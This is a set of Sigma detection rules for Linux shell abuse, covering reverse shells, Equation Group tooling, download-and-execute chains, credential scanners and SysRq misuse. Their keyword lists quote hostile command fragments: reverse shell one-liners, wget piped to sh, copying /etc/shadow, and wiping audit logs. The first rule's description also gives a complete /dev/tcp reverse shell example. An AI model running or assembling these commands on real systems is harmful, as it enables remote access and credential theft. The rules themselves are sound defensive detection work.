title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    category: network_connection
detection:
    selection:
        Image|endswith: '/bin/bash'
    filter:
        DestinationIp:
            - '127.0.0.1'
            - '0.0.0.0'
    condition: selection and not filter
falsepositives:
    - Unknown
level: critical

title: AWS EC2 Startup Shell Script Change
id: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df
status: test
description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
references:
    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9
author: faloker
date: 2020-02-12
modified: 2022-06-07
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
    - attack.t1059.004
logsource:
    product: aws
    service: cloudtrail
detection:
    selection_source:
        eventSource: ec2.amazonaws.com
        requestParameters.attribute: 'userData'
        eventName: ModifyInstanceAttribute
    condition: selection_source
falsepositives:
    - Valid changes to the startup script
level: high

title: Equation Group Indicators
id: 41e5c73d-9983-4b69-bd03-e13b67e9623c
status: test
description: Detects suspicious shell commands used in various Equation Group scripts and tools
references:
    - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
author: Florian Roth (Nextron Systems)
date: 2017-04-09
modified: 2021-11-27
tags:
    - attack.execution
    - attack.g0020
    - attack.t1059.004
logsource:
    product: linux
detection:
    keywords:
        # evolvingstrategy, elgingamble, estesfox
        - 'chown root*chmod 4777 '
        - 'cp /bin/sh .;chown'
        # tmpwatch
        - 'chmod 4777 /tmp/.scsi/dev/bin/gsh'
        - 'chown root:root /tmp/.scsi/dev/bin/'
        # estesfox
        - 'chown root:root x;'
        # ratload
        - '/bin/telnet locip locport < /dev/console | /bin/sh'
        - '/tmp/ratload'
        # ewok
        - 'ewok -t '
        # xspy
        - 'xspy -display '
        # elatedmonkey
        - 'cat > /dev/tcp/127.0.0.1/80 <<END'
        # ftshell
        - 'rm -f /current/tmp/ftshell.latest'
        # ghost
        - 'ghost_* -v '
        # morerats client
        - ' --wipe > /dev/null'
        # noclient
        - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx'
        - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;'
        # auditcleaner
        - '> /var/log/audit/audit.log; rm -f .'
        - 'cp /var/log/audit/audit.log .tmp'
        # reverse shell
        - 'sh >/dev/tcp/* <&1 2>&1'
        # packrat
        - 'ncat -vv -l -p * <'
        - 'nc -vv -l -p * <'
        # empty bowl
        - '< /dev/console | uudecode && uncompress'
        - 'sendmail -osendmail;chmod +x sendmail'
        # echowrecker
        - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron'
        # dubmoat
        - 'chmod 666 /var/run/utmp~'
        # poptop
        - 'chmod 700 nscd crond'
        # abopscript
        - 'cp /etc/shadow /tmp/.'
        # ys
        - '</dev/console |uudecode > /dev/null 2>&1 && uncompress'
        # jacktelnet
        - 'chmod 700 jp&&netstat -an|grep'
        # others
        - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755'
        - 'chmod 700 crond'
        - 'wget http*; chmod +x /tmp/sendmail'
        - 'chmod 700 fp sendmail pt'
        - 'chmod 755 /usr/vmsys/bin/pipe'
        - 'chmod -R 755 /usr/vmsys'
        - 'chmod 755 $opbin/*tunnel'
        - 'chmod 700 sendmail'
        - 'chmod 0700 sendmail'
        - '/usr/bin/wget http*sendmail;chmod +x sendmail;'
        - '&& telnet * 2>&1 </dev/console'
    condition: keywords
falsepositives:
    - Unknown
level: high

title: JexBoss Command Sequence
id: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae
status: test
description: Detects suspicious command sequence that JexBoss
references:
    - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A
author: Florian Roth (Nextron Systems)
date: 2017-08-24
modified: 2025-11-22
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
detection:
    keywords:
        '|all':
            - 'bash -c /bin/bash'
            - '&/dev/tcp/'
    condition: keywords
falsepositives:
    - Unknown
level: high

title: Script Interpreter Spawning Credential Scanner - Linux
id: f0025a69-e1b7-4dda-a53c-db21fa2d4071
related:
    - id: 0f60b28c-64dd-4e2c-9a63-5334d3e3a6e6
      type: similar
status: experimental
description: |
    Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks).
    This behavior is indicative of an attempt to find and steal secrets, as seen in the "Shai-Hulud: The Second Coming" campaign.
references:
    - https://github.com/asyncapi/cli/blob/2efa4dff59bc3d3cecdf897ccf178f99b115d63d/bun_environment.js
    - https://www.stepsecurity.io/blog/sha1-hulud-the-second-coming-zapier-ens-domains-and-other-prominent-npm-packages-compromised
    - https://www.endorlabs.com/learn/shai-hulud-2-malware-campaign-targets-github-and-cloud-credentials-using-bun-runtime
    - https://semgrep.dev/blog/2025/digging-for-secrets-sha1-hulud-the-second-coming-of-the-npm-worm/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-25
tags:
    - attack.credential-access
    - attack.t1552
    - attack.execution
    - attack.collection
    - attack.t1005
    - attack.t1059.004
logsource:
    category: process_creation
    product: linux
detection:
    selection_parent:
        ParentImage|endswith:
         # Add more script interpreters as needed
            - '/node'
            - '/bun'
    selection_child:
        - Image|endswith:
              - '/trufflehog'
              - '/gitleaks'
        - CommandLine|contains:
              - 'trufflehog'
              - 'gitleaks'
    condition: all of selection_*
falsepositives:
    - Legitimate pre-commit hooks or CI/CD pipeline jobs that use a script to run a credential scanner as part of a security check.
level: high

title: Shell Invocation via Env Command - Linux
id: bed978f8-7f3a-432b-82c5-9286a9b3031a
status: test
description: |
    Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
references:
    - https://gtfobins.github.io/gtfobins/env/#shell
    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
modified: 2026-01-08
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/env'
        CommandLine|contains:
            - '/bin/bash'
            - '/bin/dash'
            - '/bin/fish'
            - '/bin/sh'
            - '/bin/zsh'
    condition: selection
falsepositives:
    - Github operations such as ghe-backup
level: high

title: Suspicious Activity in Shell Commands
id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695
status: test
description: Detects suspicious shell commands used in various exploit codes (see references)
references:
    - https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html
    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
    - http://pastebin.com/FtygZ1cg
    - https://artkond.com/2017/03/23/pivoting-guide/
author: Florian Roth (Nextron Systems)
date: 2017-08-21
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
detection:
    keywords:
        # Generic suspicious commands
        - 'wget * - http* | perl'
        - 'wget * - http* | sh'
        - 'wget * - http* | bash'
        - 'python -m SimpleHTTPServer'
        - '-m http.server'      # Python 3
        - 'import pty; pty.spawn*'
        - 'socat exec:*'
        - 'socat -O /tmp/*'
        - 'socat tcp-connect*'
        - '*echo binary >>*'
        # Malware
        - '*wget *; chmod +x*'
        - '*wget *; chmod 777 *'
        - '*cd /tmp || cd /var/run || cd /mnt*'
        # Apache Struts in-the-wild exploit codes
        - '*stop;service iptables stop;*'
        - '*stop;SuSEfirewall2 stop;*'
        - 'chmod 777 2020*'
        - '*>>/etc/rc.local'
        # Metasploit framework exploit codes
        - '*base64 -d /tmp/*'
        - '* | base64 -d *'
        - '*/chmod u+s *'
        - '*chmod +s /tmp/*'
        - '*chmod u+s /tmp/*'
        - '* /tmp/haxhax*'
        - '* /tmp/ns_sploit*'
        - 'nc -l -p *'
        - 'cp /bin/ksh *'
        - 'cp /bin/sh *'
        - '* /tmp/*.b64 *'
        - '*/tmp/ysocereal.jar*'
        - '*/tmp/x *'
        - '*; chmod +x /tmp/*'
        - '*;chmod +x /tmp/*'
    condition: keywords
falsepositives:
    - Unknown
level: high

title: Suspicious Download and Execute Pattern via Curl/Wget
id: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
status: experimental
description: |
    Detects suspicious use of command-line tools such as curl or wget to download remote
    content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
    immediate execution, indicating potential malicious activity. This pattern is commonly used
    by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
references:
    - https://gtfobins.github.io/gtfobins/wget/
    - https://gtfobins.github.io/gtfobins/curl/
author: Aayush Gupta
date: 2025-06-17
tags:
    - attack.execution
    - attack.t1059.004
    - attack.t1203
logsource:
    category: process_creation
    product: linux
detection:
    selection_downloader:
        CommandLine|contains:
            - '/curl'
            - '/wget'
    selection_tmp:
        CommandLine|contains:
            - '/tmp/'
            - '/dev/shm/'
    selection_executor:
        CommandLine|contains: 'sh -c'
    condition: all of selection_*
falsepositives:
    - System update scripts using temporary files
    - Installer scripts or automated provisioning tools
level: high

title: Suspicious Filename with Embedded Base64 Commands
id: 179b3686-6271-4d87-807d-17d843a8af73
status: experimental
description: |
    Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.
    These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.
references:
    - https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/
author: '@kostastsale'
date: 2025-11-22
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.004
    - attack.t1027
logsource:
    product: linux
    category: file_event
detection:
    selection:
        TargetFilename|contains:
            - '{echo'
            - '{base64,-d}'
    condition: selection
falsepositives:
    - Legitimate files with similar naming patterns (very unlikely).
level: high

title: Suspicious Reverse Shell Command Line
id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab
status: test
description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
references:
    - https://alamot.github.io/reverse_shells/
author: Florian Roth (Nextron Systems)
date: 2019-04-02
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
detection:
    keywords:
        - 'BEGIN {s = "/inet/tcp/0/'
        - 'bash -i >& /dev/tcp/'
        - 'bash -i >& /dev/udp/'
        - 'sh -i >$ /dev/udp/'
        - 'sh -i >$ /dev/tcp/'
        - '&& while read line 0<&5; do'
        - '/bin/bash -c exec 5<>/dev/tcp/'
        - '/bin/bash -c exec 5<>/dev/udp/'
        - 'nc -e /bin/sh '
        - '/bin/sh | nc'
        - 'rm -f backpipe; mknod /tmp/backpipe p && nc '
        - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))'
        - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
        - '/bin/sh -i <&3 >&3 2>&3'
        - 'uname -a; w; id; /bin/bash -i'
        - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};'
        - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');'
        - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
        - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print'
        - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:'
        - 'rm -f /tmp/p; mknod /tmp/p p &&'
        - ' | /bin/bash | telnet '
        - ',echo=0,raw tcp-listen:'
        - 'nc -lvvp '
        - 'xterm -display 1'
    condition: keywords
falsepositives:
    - Unknown
level: high

title: BPFtrace Unsafe Option Usage
id: f8341cb2-ee25-43fa-a975-d8a5a9714b39
status: test
description: Detects the usage of the unsafe bpftrace option
references:
    - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/
    - https://bpftrace.org/
author: Andreas Hunkeler (@Karneades)
date: 2022-02-11
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: 'bpftrace'
        CommandLine|contains: '--unsafe'
    condition: selection
falsepositives:
    - Legitimate usage of the unsafe option
level: medium

title: Interactive Bash Suspicious Children
id: ea3ecad2-db86-4a89-ad0b-132a10d2db55
status: test
description: Detects suspicious interactive bash as a parent to rather uncommon child processes
references:
    - Internal Research
author: Florian Roth (Nextron Systems)
date: 2022-03-14
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.004
    - attack.t1036
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        ParentCommandLine: 'bash -i'
    anomaly1:
        CommandLine|contains:
            - '-c import '
            - 'base64'
            - 'pty.spawn'
    anomaly2:
        Image|endswith:
            - 'whoami'
            - 'iptables'
            - '/ncat'
            - '/nc'
            - '/netcat'
    condition: selection and 1 of anomaly*
falsepositives:
    - Legitimate software that uses these patterns
level: medium

title: Nohup Execution
id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2
status: test
description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
references:
    - https://gtfobins.github.io/gtfobins/nohup/
    - https://en.wikipedia.org/wiki/Nohup
    - https://www.computerhope.com/unix/unohup.htm
author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'
date: 2022-06-06
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith: '/nohup'
    condition: selection
falsepositives:
    - Administrators or installed processes that leverage nohup
level: medium

title: Potential Abuse of Linux Magic System Request Key
id: ea61bb82-a5e0-42e6-8537-91d29500f1b9
status: experimental
description: |
    Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges
    to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes,
    or disrupt forensic analysis—all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be
    misused as a stealthy post-exploitation tool. It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf.
references:
    - https://www.kernel.org/doc/html/v4.10/_sources/admin-guide/sysrq.txt
    - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/4/html/reference_guide/s3-proc-sys-kernel
    - https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html
author: Milad Cheraghi
date: 2025-05-23
tags:
    - attack.execution
    - attack.t1059.004
    - attack.impact
    - attack.t1529
    - attack.t1489
    - attack.t1499
logsource:
    product: linux
    service: auditd
    definition: |
        Required auditd configuration:
        -w /proc/sysrq-trigger -p wa -k sysrq
        -w /proc/sys/kernel/sysrq -p wa -k sysrq
detection:
    selection:
        type: 'PATH'
        name|endswith:
            # Enable
            - '/sysrq'
            - '/sysctl.conf'
            # Execute
            - '/sysrq-trigger'
    condition: selection
falsepositives:
    - Legitimate administrative activity
level: medium

title: Suspicious Commands Linux
id: 1543ae20-cbdf-4ec1-8d12-7664d667a825
status: test
description: Detects relevant commands often related to malware or hacking activity
references:
    - Internal Research - mostly derived from exploit code including code in MSF
author: Florian Roth (Nextron Systems)
date: 2017-12-12
modified: 2022-10-05
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    service: auditd
detection:
    cmd1:
        type: 'EXECVE'
        a0: 'chmod'
        a1: 777
    cmd2:
        type: 'EXECVE'
        a0: 'chmod'
        a1: 'u+s'
    cmd3:
        type: 'EXECVE'
        a0: 'cp'
        a1: '/bin/ksh'
    cmd4:
        type: 'EXECVE'
        a0: 'cp'
        a1: '/bin/sh'
    condition: 1 of cmd*
falsepositives:
    - Admin activity
level: medium